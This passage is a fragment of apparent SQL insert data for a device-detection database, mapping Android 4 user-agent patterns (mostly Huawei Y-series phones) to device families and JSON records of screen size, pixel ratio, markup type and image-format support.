Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y221-U33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y300-0000) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y300-0100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y300-0100) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y300-0151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y300-0151) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y320-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y320-U151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y320-U151) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y320-U30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y320-U351) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y321-U051) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U01) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U05) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U05) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U11) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y330-U15) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y336-A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y336-U02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y336-U02; Android/4.4; Release/03.07) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y336-U02; Android/4.4; Release/????.????.????????) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U03) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U23) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U31) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U61) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U61) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U72) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U72) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U82) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U82) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U93) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y360-U93) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y511-U10) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y511-U251) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y511-U251) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y511-U30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y511-U30) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y520-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y520-U22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y520-U33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y530-U00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y530-U00) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y530-U051) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y530-U051) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y536A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y540-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y541-U02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y541-U02) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y550-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y550-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y560-U02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y560-U02) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y600-U151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y600-U151) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y600-U20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y600-U20) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y600-U351) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U13) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U21) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U32) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U43) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y625-U51) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y635-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Hit) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Hol-U19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Huawei Y301A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; I211) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":540,\"screenHeight\":960,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; I213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":540,\"screenHeight\":960,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; I216A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 